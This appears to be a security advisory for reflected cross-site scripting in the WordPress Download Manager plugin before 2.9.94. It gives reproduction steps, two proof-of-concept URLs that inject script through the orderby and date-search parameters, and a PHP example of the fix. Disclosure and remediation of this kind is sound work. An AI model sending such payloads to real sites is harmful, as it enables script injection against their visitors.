In the Pro features of the WordPress Download Manager plugin, there is a Category Shortcode feature which can sort categories using an order-by function, passed as ?orderby=title,publish_date. Appending "> to the parameter, followed by any XSS payload, causes the payload to execute.

To reproduce:
1. Go to a link that contains ?orderby.
2. Append "> to the parameter, followed by a simple payload.
3. The payload will execute.

Another reflected cross-site scripting issue exists via advanced search.
https://demo.wpdownloadmanager.com/wpdmpro/list-packages/?orderby=title"><script>alert(1)</script>&order=asc

https://demo.wpdownloadmanager.com/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17"><script>alert(1)</script>&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a
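
An added example, not the plugin's own code, of the fix pattern for both parameters: allowlist the sort values, validate the date range, and escape at output. It assumes the values are reflected into an HTML attribute, which the "> breakout suggests; all function names and the allowlists are hypothetical.

```php
<?php
// Added illustration, not the plugin's code. Names and allowlists are hypothetical.
const ALLOWED_ORDERBY = ['title', 'publish_date'];   // the values named on this page
const ALLOWED_ORDER   = ['asc', 'desc'];

// Return $value only if it is in the allowlist; otherwise use the default.
function pick_allowed($value, array $allowed, string $default): string
{
    if (!is_string($value)) {            // e.g. ?orderby[]=x arrives as an array
        return $default;
    }
    $value = strtolower($value);
    return in_array($value, $allowed, true) ? $value : $default;
}

// Accept only "YYYY-MM-DD to YYYY-MM-DD" for search[publish_date].
function clean_date_range($value): string
{
    if (!is_string($value)) {
        return '';
    }
    $ok = preg_match('/\A\d{4}-\d{2}-\d{2} to \d{4}-\d{2}-\d{2}\z/', $value);
    return $ok === 1 ? $value : '';
}

// Escape for an HTML attribute context. In WordPress, esc_attr() does this job.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input mirroring the two requests above, after URL decoding.
$query = [
    'orderby' => 'title"><script>alert(1)</script>',
    'order'   => 'asc',
    'search'  => ['publish_date' => '2019-04-17 to 2019-04-17"><script>alert(1)</script>'],
];

$orderby = pick_allowed($query['orderby'] ?? null, ALLOWED_ORDERBY, 'title');
$order   = pick_allowed($query['order'] ?? null, ALLOWED_ORDER, 'asc');
$range   = clean_date_range($query['search']['publish_date'] ?? null);

// Vulnerable pattern: the raw value is concatenated into an attribute.
$before = '<input name="orderby" value="' . $query['orderby'] . '">';
// Hardened pattern: validated values, still escaped at the point of output.
$after  = '<input name="orderby" value="' . attr($orderby) . '">'
        . '<input name="order" value="' . attr($order) . '">'
        . '<input name="search[publish_date]" value="' . attr($range) . '">';

echo attr($before), "\n", $after, "\n";   // $before is escaped here only for safe display
```

With the sample input, the tampered orderby falls back to title and the tampered date range is rejected as an empty string, so neither value reaches the markup.
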
CPE

Name | Operator | Version
---|---|---
download-manager | lt | 2.9.94